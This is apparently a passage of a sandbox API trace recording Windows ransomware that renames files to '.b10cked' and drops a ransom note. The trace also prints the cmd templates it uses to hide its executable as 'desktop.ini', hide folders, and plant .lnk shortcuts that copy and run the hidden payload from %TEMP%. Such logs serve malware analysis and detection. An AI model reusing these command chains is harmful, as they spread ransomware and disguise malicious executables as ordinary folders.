lpMultiByteStr="cii3Zm5ag7.wav", lpUsedDefaultChar=0x0) returned 14 [0226.796] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x8deb [0226.796] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0226.796] CloseHandle (hObject=0x1b4) returned 1 [0226.797] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\cii3Zm5ag7.wav", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\CII3ZM~1.WAV") returned 0x33 [0226.798] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\") returned 0x27 [0226.798] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\CII3ZM~1.WAV\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\cii3Zm5ag7.wav.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\CII3ZM~1.WAV\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\cii3Zm5ag7.wav.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x210, dwThreadId=0xf00)) returned 1 [0226.803] CloseHandle (hObject=0x120) returned 1 [0226.803] CloseHandle (hObject=0x1b4) returned 1 [0226.803] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\", cchLength=0x27 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\") returned 0x27 [0226.803] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\", cchLength=0x1e | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\") returned 0x1e [0226.803] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\", cchCount1=39, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\", cchCount2=30) returned 3 [0226.803] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\", cchLength=0x27 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\") returned 0x27 [0226.803] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0226.803] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\", cchCount1=39, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0226.803] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0226.803] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0226.803] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0226.803] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\") returned 0x27 [0226.803] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0226.804] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0226.804] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xfb0, dwThreadId=0xdd4)) returned 1 [0226.861] CloseHandle (hObject=0x120) returned 1 [0226.861] CloseHandle (hObject=0x1b4) returned 1 [0226.861] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\bl0cked-readme.rtf")) returned 0xffffffff [0226.861] GetLastError () returned 0x2 [0226.861] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0226.865] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\bl0cked-readme.rtf")) returned 0x20 [0226.865] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0226.865] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0226.866] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0226.866] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0226.866] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0226.866] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0226.866] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0226.866] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\", lpszShortPath=0x123ffac, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\") returned 0x27 [0226.866] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0226.866] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0226.866] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00", lpszShortPath=0x123fd6c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00") returned 0x26 [0226.867] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x156 | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x156 [0226.867] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0226.867] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\"", lpProcessInformation=0x12fb78*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xea8, dwThreadId=0xf3c)) returned 1 [0226.869] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0228.307] CloseHandle (hObject=0x1b4) returned 1 [0228.307] CloseHandle (hObject=0x120) returned 1 [0228.307] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0228.307] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0228.307] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0228.307] GetTickCount () returned 0x3eef0 [0228.307] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=28509651404) returned 1 [0228.307] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x78\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0228.307] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x70\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0228.307] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x76\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0228.307] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x38\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0228.307] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x39\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0228.307] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x71\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0228.308] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x38\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0228.308] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x65\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0228.308] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0228.308] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0228.308] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0228.308] CharUpperBuffW (in: lpsz="explorer.exe \"hqVibu00\" & type \"hqVibu00\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x61 | out: lpsz="EXPLORER.EXE \"HQVIBU00\" & TYPE \"HQVIBU00\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x61 [0228.308] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0228.308] CharUpperBuffW (in: lpsz="explorer.exe \"hqVibu00\" & type \"hqVibu00\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x62 | out: lpsz="EXPLORER.EXE \"HQVIBU00\" & TYPE \"HQVIBU00\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x62 [0228.308] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0228.308] CoInitialize (pvReserved=0x0) returned 0x0 [0228.308] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0228.309] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0228.309] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0228.309] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0228.312] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"hqVibu00\" & type \"hqVibu00\\desktop.ini\" > \"%TEMP%\\xpv89q8e.exe\" && \"%TEMP%\\xpv89q8e.exe\"") returned 0x0 [0228.312] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0228.312] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0228.312] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0228.312] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00.lnk", fRemember=0) returned 0x0 [0228.322] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0228.322] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0228.322] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0228.322] CoUninitialize () [0228.323] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.323] ReleaseMutex (hMutex=0xf8) returned 1 [0228.323] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.323] ReleaseMutex (hMutex=0xf8) returned 1 [0228.323] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.323] ReleaseMutex (hMutex=0xf8) returned 1 [0228.323] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.323] ReleaseMutex (hMutex=0xf8) returned 1 [0228.323] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\LUKOkovEeIsTMf0.png" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\lukokoveeistmf0.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0228.323] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.323] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2f39 [0228.324] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.324] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=28511283034) returned 1 [0228.324] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.324] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2f39 [0228.324] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.324] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.324] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2f39 [0228.324] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.324] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0228.324] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x2f39 [0228.324] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0228.324] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.324] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2f39 [0228.324] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.324] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.324] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2f39 [0228.325] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.325] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.325] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2f39 [0228.325] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.325] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.325] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2f39 [0228.325] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.325] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.325] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2f39 [0228.325] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, 